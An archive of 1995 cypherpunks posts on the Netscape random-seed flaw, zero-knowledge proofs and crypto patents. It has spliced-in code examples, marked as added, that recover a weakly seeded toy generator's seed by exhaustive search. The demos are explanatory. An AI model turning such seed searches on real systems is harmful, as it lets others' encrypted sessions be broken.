> memcpy(init,data,sizeof(des_cblock));
> 
> Rather hard to notice unless you know that des_cblock is passed as a 
> pointer and even this can be compiler dependent.

Sure that's hard to notice, but what you describe was an accident, ie
the code wasn't working as you thought it was.

The netscape one by the sound of it, and the earlier posts of the
reverse-engineered ran no code, was working to spec, it was just a
dumb spec.

I felt sorry for netscape when they got chosen as the example of an
ITAR crippled app to break, the breakers intention obviously being to
tar ITAR, but some of the bad publicity rubbing off on netscape, who
were obviously fully aware of the weakness of 40 bit keys.

This one tho' sounds very much like due to sloppy design which is
inexcusable, especially given that they are going around selling the
128 bit RC4 browser to people who may have been relying on it, at its
word, and presume the rest of the cryptographic system was up to
suitable standard to match 128 bit keys.

aka what's the point having 128 bit keys if you use a 32 bit, or 40
bit or 48 bit seed, which can be further narrowed with non-root access
to the machine, and even with external info leaked by the machine.

> The moral of the story I suppose is to be 
> paranoid about checking routines relating to RNG.

Well that is a valid, and very good moral, but the netscape story is a
different story I think, as they knew what their code was doing, and
somehow didn't think it was a problem, or didn't even pause to
consider the ran no generation security.  Reckon any bad publicity
they get out of this one is entirely their own fault.

The moral in netscape's story is that closed systems are bad news.
These things ideally need open review.  And of course designing things
with the expectation that they are secure with the *given* that the
full algorithm is known.

Real shame because the rest of the software is very innovative
compared to other browsers, and apparently good quality.  Also may be
a set back for net commerce, which is bad news.

Adam
--
Munitions-T home page:  http://www.obscura.com/~shirt/

#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
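
[Added example, not part of the archived message and not code from the DES library it mentions: the sizeof slip Eric Young describes in the quoted text above, next to the fix he gives, with a count of how many seed bytes actually arrive. The typedef, the function names, the pointer-to-array variant and the sample seed are assumptions made for this sketch.]

```c
#include <stdio.h>
#include <string.h>

typedef unsigned char des_cblock[8];      /* 8-byte DES block, as in the quoted message */

static unsigned char init[sizeof(des_cblock)];   /* seed buffer (name from the message) */

/* Count how much of the seed buffer actually received caller data. */
static size_t seeded_bytes(void) {
    size_t n = 0;
    for (size_t i = 0; i < sizeof init; i++) n += (init[i] != 0);
    return n;
}

/* As quoted. A parameter declared `des_cblock data` is adjusted to
   `unsigned char *data`, so sizeof(data) is the size of a pointer:
   4 on a 32-bit ABI, 8 on LP64 (this sketch assumes pointers of at most 8 bytes). */
static size_t seed_as_quoted(des_cblock data) {
    memset(init, 0, sizeof init);
    memcpy(init, data, sizeof(data));
    return seeded_bytes();
}

/* The fix from the message: name the type, not the parameter. */
static size_t seed_fixed(des_cblock data) {
    memset(init, 0, sizeof init);
    memcpy(init, data, sizeof(des_cblock));
    return seeded_bytes();
}

/* Sturdier variant (an addition here): take a pointer to the whole array,
   so sizeof(*data) is the array size on every ABI. */
static size_t seed_by_array_pointer(des_cblock *data) {
    memset(init, 0, sizeof init);
    memcpy(init, *data, sizeof(*data));
    return seeded_bytes();
}

int main(void) {
    des_cblock seed = {0xA1, 0xB2, 0xC3, 0xD4, 0xE5, 0xF6, 0x17, 0x28};  /* constructed */
    printf("as quoted:        %zu of 8 bytes\n", seed_as_quoted(seed));
    printf("fixed:            %zu of 8 bytes\n", seed_fixed(seed));
    printf("pointer-to-array: %zu of 8 bytes\n", seed_by_array_pointer(&seed));
    return 0;
}
```

On a 64-bit build the quoted form happens to copy all 8 bytes, which is the compiler dependence the message mentions; current GCC and Clang report the first form under -Wsizeof-array-argument.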





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 12:29:18 PDT
To: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Subject: Re: Verification of Random Number Generators
In-Reply-To: <9509191821.AA21270@spirit.aud.alcatel.com>
Message-ID: <199509191924.MAA20090@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> BTW: In some ways, I feel sorry for Netscape being nailed by everyone
> including the press like this.  BUT - they must also accept that

	I'm sorry, but they deserve it. Their seed generation was just
plain stupid.


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Tue, 19 Sep 95 09:35:25 PDT
To: cypherpunks@toad.com
Subject: Random publicity was: articles
In-Reply-To: <199509191435.HAA00275@infinity.c2.org>
Message-ID: <43mrf2$arr@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509191435.HAA00275@infinity.c2.org>,
sameer  <sameer@c2.org> wrote:
>	If you could, please send me the name of the reporter and
>contact information for any articles you see regarding the netscape
>hack.
>
>Thanks,
>-- 
>sameer						Voice:   510-601-9777
>Community ConneXion				FAX:	 510-601-9734
>An Internet Privacy Provider			Dialin:  510-658-6376
>http://www.c2.org (or login as "guest")			sameer@c2.org

So far, I talked to the NYT and the WSJ yesterday, as well as the SF Chronicle.

This morning, one of the University's publicity people
<rls@pio.urel.berkeley.edu> forwarded Marketplace (a radio show)
and CNN (sending a camera crew) to me.

I've also received email from various people, including someone who
works in security at the Pentagon.

I wonder if I should tell them I'm not an American?

   - Ian "but I'm Canadian, so that's the same thing, right?" :-(




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 19 Sep 95 10:39:18 PDT
To: aba@dcs.exeter.ac.uk
Subject: Re: NYT on Netscape Crack
Message-ID: <9509191738.AA00941@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Adam Back writes:
>  Posting the code for the random number generator would be an
>  excellent start.

Ian posted the code for the PRNG on August 30th and Stephen Kapp noted that  
it was similar to one in RSAREF.  The PRNG is probably fine.  The big flaw  
here was the collection of seed material.  The bottom line is the WHOLE  
security subsystem should be published for analysis.

>  Or if that doesn't sit well with copyright interests, how about
>  writing up an open spec about how the random number generator works?
>  Then we can critique it.

Netscape did this with SSL and what happened was the rest of the industry  
jumped on it before any analysis was done.  Now we are likely stuck with a  
poor protocol.

>  An algorithm should be something to be proud of, "it's secure, and
>  see:  this is how it works, here are the design criteria, here is
>  how you would attempt to break it, and here is the best predicted
>  attack's cost."

The design may be great, but if the implementation is flawed then you aren't  
much better off.  To attempt to evaluate the security of a system you need to  
be able to inspect the implementation.  Period.

>  is netscape still a progressive startup company with hot programmers
>  running the show, or has it slipped into stuffy corporate realms
>  already?

Netscape may have hot programmers but so far I believe it has become  
self-evident that they know little about crypto and implementing  
cryptosystems.

To Netscape's credit, Jeff Weinstein claims that the team implementing the  
security for Navigator 2.0 is completely new and of course Netscape has hired  
Tahir ElGamal, who certainly knows what he is doing.  Additionally I would  
suspect that with all the bad publicity they are receiving they would take up  
Bidzos on RSADSI's offer to analyze the source.  So it is entirely possible  
that Navigator 2.0 will be much better.  However, I am not holding my breath.


Strong crypto is _hard_ to implement properly.  Even if a product is using a  
well-known algorithm there could be any number of subtle flaws that can  
destroy any security offered by such algorithm.  You can't just toss in RSA,  
IDEA, RC-4, DES, etc... and claim the thing is secure.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 19 Sep 95 12:47:34 PDT
To: cypherpunks@toad.com
Subject: Re: Verification of Random Number Generators
Message-ID: <199509191947.MAA23655@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:54 AM 9/19/95 -0500, andrew wrote, replying to Erik Fair:
>>  Just an idle thought: it might be possible to do a probabilistic
>>  verification of a RNG by sampling it over some number of samples,

>But this wouldn't have solved Netscape's problem.  Netscape was using a  
>pretty good PRNG (the one in RSAREF).  The problem was they were/are using a  
>naive method of seeding it.  The output of the PRNG would have been  
>statistically random, but since the seed had ridiculously little entropy it  
>was easy to guess.

It's even worse - the seeding mechanism has too little entropy, given that
you know some of the input data (e.g. system clock), but if it had, say,
32 bits of entropy, you'd have to run your test tens or hundreds of billions
of times for the patterns to really show up - which is hard to do for something
that uses the system clock or other hardware - and you'd really have to get
at the output of the seeding process rather than the PRNG output, which has
been filtered through enough MD5 that it's hard to detect the patterns.
But you could still crack it easily enough.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
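
[Added example, not part of the archived messages and not Netscape's or RSAREF's code: the point made in Andrew Loewenstern's message and in the reply above, that a black-box statistical test on generator output says nothing about the seed. The generator is a stand-in (SplitMix64), and the clock-plus-process-id seeding, the 15-bit pid range and the sample values are assumptions constructed for this sketch.]

```c
#include <stdint.h>
#include <stdio.h>

/* Stand-in generator (SplitMix64). It is NOT the RSAREF/MD5 generator from the
   thread; any generator with good output statistics makes the same point. */
typedef struct { uint64_t state; } prng_t;

static uint64_t finalize(uint64_t z) {
    z = (z ^ (z >> 30)) * 0xBF58476D1CE4E5B9ULL;
    z = (z ^ (z >> 27)) * 0x94D049BB133111EBULL;
    return z ^ (z >> 31);
}

static uint64_t prng_next(prng_t *g) {
    g->state += 0x9E3779B97F4A7C15ULL;
    return finalize(g->state);
}

/* Constructed naive seeding: clock seconds and a 15-bit process id, nothing else. */
#define PID_SPACE 32768u
static void seed_naive(prng_t *g, uint32_t secs, uint32_t pid) {
    g->state = finalize(((uint64_t)secs << 15) | (pid % PID_SPACE));
}

/* Black-box check: monobit frequency test over 4096 outputs (2^18 bits).
   sigma = sqrt(n)/2 = 256; accept if the ones count is within 6 sigma of n/2.
   Takes the generator by value, so the caller's state is not advanced. */
static int monobit_passes(prng_t g) {
    long ones = 0;
    for (int i = 0; i < 4096; i++)
        for (uint64_t w = prng_next(&g); w; w &= w - 1) ones++;
    long dev = ones - 131072L;
    if (dev < 0) dev = -dev;
    return dev <= 6 * 256;
}

/* White-box audit: number of seeds consistent with what an outsider knows
   (the clock to within +/- window seconds, any pid). */
static uint64_t seed_space(uint32_t window) {
    return (uint64_t)(2 * window + 1) * PID_SPACE;
}

static int floor_log2(uint64_t x) {
    int b = -1;
    while (x) { x >>= 1; b++; }
    return b;
}

/* Walk that candidate set and compare each candidate's first output with one
   observed value. Returns the number of candidates tried, or 0 if none match. */
static uint64_t recover_seed(uint64_t observed, uint32_t t_guess, uint32_t window,
                             uint32_t *secs_out, uint32_t *pid_out) {
    uint64_t tried = 0;
    for (uint32_t s = t_guess - window; s <= t_guess + window; s++)
        for (uint32_t p = 0; p < PID_SPACE; p++) {
            prng_t g;
            seed_naive(&g, s, p);
            tried++;
            if (prng_next(&g) == observed) { *secs_out = s; *pid_out = p; return tried; }
        }
    return 0;
}

int main(void) {
    prng_t g;
    uint32_t s = 0, p = 0;
    seed_naive(&g, 811500000u, 12345u);            /* constructed sample values */
    printf("monobit test passes: %d\n", monobit_passes(g));
    uint64_t tried = recover_seed(prng_next(&g), 811500001u, 2, &s, &p);
    printf("seed found after %llu of %llu candidates (about %d bits)\n",
           (unsigned long long)tried, (unsigned long long)seed_space(2),
           floor_log2(seed_space(2)));
    return 0;
}
```

The output passes the statistical test, yet the seed space is about 17 bits whatever the session key length, so a review has to measure the seeding inputs rather than sample the output.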





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eli Brandt <eli@UX3.SP.CS.CMU.EDU>
Date: Tue, 19 Sep 95 09:51:00 PDT
To: cypherpunks@toad.com
Subject: Re: Explaining Zero Knowledge to your children
In-Reply-To: <9509181655.AA06115@elysion.iaks.ira.uka.de>
Message-ID: <9509191650.AA21716@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hadmut Danisch suggested:
> Alice is caught in a dark room somewhere on the world. She doesn't know
> where she is, but there is a telephone in the room and she calls Bob to
> ask him where she is. Bob claims to know it but doesn't want to reveal. 
> He calls her back. When the phone is ringing, he has proven the knowledge

I don't think this captures the structure of a ZNP.  There's no
multi-round system, for one thing.

how about this:
Alice and Bob have a big, complicated maze, preferably non-planar.
Alice can solve the maze, and wants to prove this to Bob.
Alice picks a point P on a solution path.
Bob asks Alice to
	(a) exhibit a path from Start to P.
   or	(b) exhibit a path from P to Finish.
Alice can easily do either one.

If Alice doesn't know the maze, she can try to cheat, 
by picking a P by tracing forwards from Start,
or by tracing backwards from Finish.
These ploys allow her to sleaze through tests (a) and (b) respectively.
But if Bob flips a coin to select (a) versus (b), he has a 50-percent
chance of catching with each round.

This is not really zero-knowledge.  With each round, Alice is giving
Bob substantial knowledge about the maze.  With sufficient rounds,
she ends up giving him the whole thing.  But if the maze is hairy
enough, this captures the idea that Alice can prove (to within epsilon)
to Bob that she has a solution, without giving it away entirely.

--
   Eli Brandt
   eli+@cs.cmu.edu
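
[Added example, not part of the archived message: the maze protocol described above, run as a simulation. It counts how many coin sequences an honest Alice and a cheating Alice survive, and how much of the solution Bob has seen. The ten-node maze, the wandering rule for the cheater and all names are assumptions constructed for this sketch.]

```c
#include <stdio.h>
enum { N = 10, START = 0, FINISH = 9, SOL_LEN = 6 };
/* Constructed maze as an undirected graph: 0-1-2-3-4-9 is the only route from
   Start to Finish; 0-5-6 and 9-8-7 are dead ends. */
static const int EDGES[][2] = {{0,1},{1,2},{2,3},{3,4},{4,9},{0,5},{5,6},{9,8},{8,7}};
static const int SOLUTION[SOL_LEN] = {0, 1, 2, 3, 4, 9};   /* Alice's secret */
/* What Alice holds after committing to P: the paths she is able to show. */
typedef struct { int p, fwd[N], fwd_len, bwd[N], bwd_len; } commitment;

static int adjacent(int u, int v) {
    for (size_t i = 0; i < sizeof EDGES / sizeof EDGES[0]; i++)
        if ((EDGES[i][0] == u && EDGES[i][1] == v) ||
            (EDGES[i][0] == v && EDGES[i][1] == u)) return 1;
    return 0;
}

/* Bob's check: the path runs from `from` to `to` along real corridors. */
static int valid_path(const int *p, int len, int from, int to) {
    if (len < 1 || p[0] != from || p[len - 1] != to) return 0;
    for (int i = 0; i + 1 < len; i++)
        if (!adjacent(p[i], p[i + 1])) return 0;
    return 1;
}

/* Honest Alice: P is an interior point of her solution, varied per round. */
static void honest_commit(int round, commitment *c) {
    int k = 1 + round % (SOL_LEN - 2);
    c->p = SOLUTION[k];
    c->fwd_len = k + 1;
    c->bwd_len = SOL_LEN - k;
    for (int i = 0; i <= k; i++) c->fwd[i] = SOLUTION[i];
    for (int i = k; i < SOL_LEN; i++) c->bwd[i - k] = SOLUTION[i];
}

/* Without the solution Alice can only wander: highest-numbered unvisited neighbour first. */
static int wander(int from, int steps, int *out) {
    int seen[N] = {0}, len = 0, cur = from;
    out[len++] = cur; seen[cur] = 1;
    while (steps-- > 0) {
        int next = -1;
        for (int v = N - 1; v >= 0 && next < 0; v--)
            if (!seen[v] && adjacent(cur, v)) next = v;
        if (next < 0) break;
        cur = next; out[len++] = cur; seen[cur] = 1;
    }
    return len;
}

/* Cheating Alice bets on Bob's coin before committing (guess_b: she bets on (b)). */
static void cheat_commit(int guess_b, commitment *c) {
    int tmp[N], n = wander(guess_b ? FINISH : START, 2, tmp);
    c->p = tmp[n - 1];
    c->fwd_len = guess_b ? 0 : n;
    c->bwd_len = guess_b ? n : 0;
    for (int i = 0; i < n; i++)   /* a backward trace is shown reversed: P..Finish */
        if (guess_b) c->bwd[i] = tmp[n - 1 - i]; else c->fwd[i] = tmp[i];
}

/* Bit i of `coins` is Bob's round-i coin (0 asks (a), 1 asks (b)); bit i of
   `guesses` is the cheater's bet. Returns 1 if Bob accepts every round. */
static int run_protocol(int honest, unsigned guesses, unsigned coins, int rounds) {
    for (int i = 0; i < rounds; i++) {
        commitment c;
        if (honest) honest_commit(i, &c); else cheat_commit((guesses >> i) & 1, &c);
        int ok = ((coins >> i) & 1) ? valid_path(c.bwd, c.bwd_len, c.p, FINISH)
                                    : valid_path(c.fwd, c.fwd_len, START, c.p);
        if (!ok) return 0;
    }
    return 1;
}

/* How many of the 2^rounds possible coin sequences a prover survives. */
static unsigned accepting_sequences(int honest, unsigned guesses, int rounds) {
    unsigned count = 0;
    for (unsigned coins = 0; coins < (1u << rounds); coins++)
        count += (unsigned)run_protocol(honest, guesses, coins, rounds);
    return count;
}

/* The caveat in the message: solution nodes Bob has seen after honest rounds. */
static int nodes_leaked(unsigned coins, int rounds) {
    int seen[N] = {0}, total = 0;
    for (int i = 0; i < rounds; i++) {
        commitment c;
        honest_commit(i, &c);
        int b = (coins >> i) & 1, len = b ? c.bwd_len : c.fwd_len;
        for (int j = 0; j < len; j++) {
            int v = b ? c.bwd[j] : c.fwd[j];
            if (!seen[v]) { seen[v] = 1; total++; }
        }
    }
    return total;
}

int main(void) {
    printf("honest %u/1024, cheater %u/1024, leaked %d/6 nodes\n",
           accepting_sequences(1, 0, 10), accepting_sequences(0, 0x2A5u, 10),
           nodes_leaked(0x2u, 2));
    return 0;
}
```

A cheater who must commit before the coin is flipped survives exactly one of the 1024 ten-round sequences, while in this small maze two honest rounds can already show Bob the whole route, which is the leak the message points out.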



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Tue, 19 Sep 95 12:51:00 PDT
To: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Subject: Re: Random publicity was: articles
In-Reply-To: <43mrf2$arr@calum.csclub.uwaterloo.ca>
Message-ID: <199509191950.MAA06575@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| This morning, one of the University's publicity people
| <rls@pio.urel.berkeley.edu> forwarded Marketplace (a radio show)
| and CNN (sending a camera crew) to me.

Ouch - had a good night's sleep, did you? :-)

| I've also received email from various people, including someone who
| works in security at the Pentagon.
| 
| I wonder if I should tell them I'm not an American?
| 
|    - Ian "but I'm Canadian, so that's the same thing, right?" :-(

Too bad, you should have been a Swede, like me. Wouldn't it be fun
to say something like; "Well, I'm not allowed to reveal this weakness
to any American, since I'm not allowed to export munitions!"

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Tue, 19 Sep 95 10:01:59 PDT
To: Steven Levy <steven@echonyc.com>
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <Pine.3.89.9509180959.B28455-0100000@echonyc>
Message-ID: <Pine.SUN.3.91.950919125457.17290A-100000@dorsai.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Sep 1995, Steven Levy wrote:

> No chance. The problem for me isn't that someone wanted to call a movie 
> Hackers but that it causes confusion in that for eleven years there has 
> been a preexisting work by that name.  There is a novelization of the 
> screenplay now in paperback, so if a friend recommends that you buy 
> Hackers, you'll probably buy that one. (especially since Dell is 
> determined to do as little as possible for my own book). 

Or vice versa.  Someone could want to get the book based on the movie and 
wind up buying your book - thereby benefiting you instead of Dell or 
whomever is publishing the one based on the screen play.

I wouldn't worry over it. :-)  It may turn out that this will cause your 
book to suddenly surge. 

==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
==========================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Tue, 19 Sep 95 11:21:57 PDT
To: jsw@neon.netscape.com
Subject: Re: Verification of Random Number Generators
Message-ID: <9509191821.AA21270@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Just an idle thought: it might be possible to do a probabilistic
> verification of a RNG by sampling it over some number of samples, and
> statistically analyzing the sample space. This would be analysis under the
> model of "RNG as black box" as opposed to (or rather, if you're smart, in
> addition to) code inspection & review. Any statisticians among us?
> 

In a word - no.

In a longer description - you can black box test the *pseudo-RNG in
one of two ways.  

One, input a key, and then keep asking for numbers.  The numbers 
should be statistically distributed, and should have a very long 
repeat cycle.  (i.e. basic "good" pseudo-random number generator
theory)

Two, input different keys, and then ask for a number.  Again,
the numbers should be statistically distributed, even for small
changes in the input numbers.  

What *both* of those methods don't test, is the key(seed) generation,
which is what was attacked on Netscape.  The seed number
must be truly random, and unknowable to the attacker, otherwise
they can duplicate the random number generator.  Remember that
all random number generators in software are really pseudo-random
number generators, and rely on having a seed value.

BTW: In some ways, I feel sorry for Netscape being nailed by everyone
including the press like this.  BUT - they must also accept that
with being popular, they will be subject to intense 
scrutiny.  Besides - if you are going to attack a cryptosystem, why
not get your 15 minutes of fame out of the deal while you are at it ;-)

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 19 Sep 95 10:54:27 PDT
To: "Rev. Mark Grant" <mark@unicorn.com>
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <Pine.3.89.9509191823.A881-0100000@unicorn.com>
Message-ID: <Pine.D-G.3.91.950919135026.18165A-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Sep 1995, Rev. Mark Grant wrote:

> On Sun, 17 Sep 1995, Brian Davis wrote:
> 
> > Phill obviously presents one point of view, vigorously and well.  What do 
> > the rest of you think about a teen who, say, busts into a .edu site, 
> > plays with the files, and ultimately brings the system down entirely for 
> > 36 hours?  Fun and games?  Send him to his room, sans modem? Prosecute 
> > him?  Have a TLA hire him???
> 
> If it wasn't for ITAR the Net would already have secure encryption and
> authentication, and most such hacker attacks would be impossible (or at 
> least impractical).
> 
> 		Mark

The non-responsive answer is stricken from the record.  :-)
You mean "secure" as Netscape was secure from sameer et al.?

Apples and oranges answer to my perhaps-not-so-hypothetical question.  

Still waiting for a serious response ...

Brian





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Tue, 19 Sep 95 11:03:34 PDT
To: cypherpunks@toad.com
Subject: unabomber paper
Message-ID: <199509191803.OAA15542@grape-nuts.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



is available on

	 http://www.ai.mit.edu/misc/unabomber





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Nielsen <nielsenc@upgrade.com>
Date: Tue, 19 Sep 95 11:18:41 PDT
To: "Erik E. Fair" (Time Keeper) <fair@clock.org>
Subject: Re: Verification of Random Number Generators
In-Reply-To: <v02110102ac849090d9fe@[17.255.9.110]>
Message-ID: <199509191817.OAA05143@upgrade.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Sep 1995 09:04:29 -0700  
"Erik E. Fair" wrote:
--------
>> 
>> Just an idle thought: it might be possible to do a probabilistic
>> verification of a RNG by sampling it over some number of samples, and
>> statistically analyzing the sample space. This would be analysis under the
>> model of "RNG as black box" as opposed to (or rather, if you're smart, in
>> addition to) code inspection & review. Any statisticians among us?
>> 
>> Erik Fair
>> 

But statistical tests of randomness alone do not make a good RNG.
At least, not for cryptographic use. A cryptographically secure
RNG is also unpredictable, i.e., computationally unfeasible to
predict what the next random bit will be given the algorithm, and not
reliably reproduced, i.e., multiple runs with the exact same input
do not generate the same sequence.

-Chris

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Christopher Nielsen                               UCA&L
System and Network Administrator                  Buffalo, New York
(nielsenc@upgrade.com)                            #include <disclaimer.h>
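
The point made in Dan Oelke's and Christopher Nielsen's replies above, as an added example (not code from the thread or from any product discussed in it): output that passes a black-box statistical test can still be reproduced by anyone who can enumerate the seed. The toy SHA-256 counter generator, the 16-bit seed space, and all function names are assumptions made for the illustration.

```python
import hashlib
import os
from collections import Counter

SEED_BITS = 16  # assumption: the weak seeder can only produce 2**16 values


def keystream(seed: bytes, nbytes: int) -> bytes:
    """Toy generator: SHA-256(seed || counter) blocks, concatenated.
    The output looks uniform whatever the quality of the seed."""
    out = bytearray()
    counter = 0
    while len(out) < nbytes:
        out += hashlib.sha256(seed + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:nbytes])


def weak_seed(value: int) -> bytes:
    """Seed drawn from a small, guessable space (constructed for the demo)."""
    return (value % (1 << SEED_BITS)).to_bytes(2, "big")


def strong_seed() -> bytes:
    """Seed taken from the operating system's entropy pool (128 bits)."""
    return os.urandom(16)


def chi_square_bytes(data: bytes) -> float:
    """Chi-square statistic of byte frequencies against a uniform model.
    With 255 degrees of freedom the mean is 255; values above roughly
    330 would be rejected at the 0.1% level."""
    expected = len(data) / 256
    counts = Counter(data)
    return sum((counts.get(b, 0) - expected) ** 2 / expected
               for b in range(256))


def recover_weak_seed(observed: bytes):
    """Audit step: try every seed the weak seeder could have produced and
    return the one whose output starts with the observed bytes."""
    for candidate in range(1 << SEED_BITS):
        if keystream(weak_seed(candidate), len(observed)) == observed:
            return candidate
    return None


def demo():
    weak = keystream(weak_seed(0xBEEF), 65536)
    strong = keystream(strong_seed(), 65536)
    found = recover_weak_seed(weak[:8])
    return {
        # Both streams look alike to the black-box test.
        "chi2_weak": chi_square_bytes(weak),
        "chi2_strong": chi_square_bytes(strong),
        # Eight observed bytes are enough to pin down the weak seed,
        # after which every later byte is predictable.
        "recovered_seed": found,
        "future_output_predicted":
            keystream(weak_seed(found), 65536)[8:] == weak[8:],
        # The same search finds nothing for the OS-seeded stream.
        "strong_seed_found": recover_weak_seed(strong[:8]) is not None,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```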




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Tue, 19 Sep 95 11:22:00 PDT
To: cypherpunks@toad.com
Subject: ASCII unabomber paper attribution and FTP address
Message-ID: <199509191821.OAA15570@grape-nuts.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



N.B. unabomber paper is via JYA_lbr.  Also available via FTP

	ftp://ftp.ai.mit.edu/users/misc/unabomber




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Tue, 19 Sep 95 15:00:48 PDT
To: cypherpunks@toad.com
Subject: Re: Cylink
Message-ID: <199509192138.OAA07353@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain


> WSJ, Sept 19, 1995.
> 
> Cylink Claims Right To Key Technology Involving
> Encryption
> 
> ...
> 
> Sunnyvale, Calif. - A Silicon Valley company asserted a
> legal claim to a key technology for protecting electronic
> commerce, following an arbitration ruling.
> 
>                                  ... The arbitrators
> ruled that RSA hasn't had the right to sublicense the
> Stanford patents since 1990.
> 
> Cylink said it would seek royalties from companies that
> have licensed software code from RSA and are
> redistributing it, arguing that they are infringing the
> Stanford patents.
> 

This was reported in the San Jose Mercury News today,
as well.  They reported that Cylink licenses the patents
for $50,000.  I'm assuming that the main patent in question
is the Diffie-Hellman patent (only 1 year and 7 months to
DH Freedom Day!).  Since PKP (and Bidzos, now president of
RSA) always said that DH covered all public key encryption,
it would seem that any RSA licensee would also need a license
from Cylink.

The Merc article said that RSA's and Cylink's interpretation
of the arbitrators' ruling were completely opposite.  I haven't
seen a copy of the ruling.  The Merc says that "Outside observers
tend to take RSA's view of things."

I'm stunned that an arbitrator could make an uninterpretable ruling
on something so cut and dried, but then, IANAL.

I've called both PKP and RSA, I haven't been able to talk to anybody
about it yet.

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-8624




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Daniel C. Cotey" <dccotey@eclat.uccs.edu>
Date: Tue, 19 Sep 95 13:50:03 PDT
To: "Rev. Mark Grant" <mark@unicorn.com>
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <Pine.3.89.9509191823.A881-0100000@unicorn.com>
Message-ID: <Pine.ULT.3.91.950919143844.5998B-100000@eclat>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Sep 1995, Rev. Mark Grant wrote:

>
> If it wasn't for ITAR the Net would already have secure encryption and
> authentication, and most such hacker attacks would be impossible (or at 
> least impractical).
> 

	As someone who has hacked a little I would say that sloppy coding 
(much like netscape's) has helped hackers far more than lack of 
encryption.  Imagine for a moment if sun had included some form of 
encryption (maybe in nfs ?) in sunos 4.x.x,  would it have been 
effective if it had as many holes as sendmail, etc.. ?

	Good algorithms well coded will hurt hackers. Good algorithms 
sloppily coded will simply provide hackers with one more toy to abuse, 
while giving average people a false sense of security (but you SAID it 
was strong crypto, so why did they get my credit card number ?)


 pUFF 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Tue, 19 Sep 95 11:56:10 PDT
To: clav@deltanet.com (David Clavadetscher)
Subject: Encryption algorithms used in PrivaSoft
In-Reply-To: <9509191826.AA19743@server1.deltanet.com>
Message-ID: <9509191855.AA04334@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dear PrivaSoft-

Your Web page, "What is PrivaSoft ?" 
(http://www.megasoft.com/privasoft/about.html) says:

> How does it work? 
>
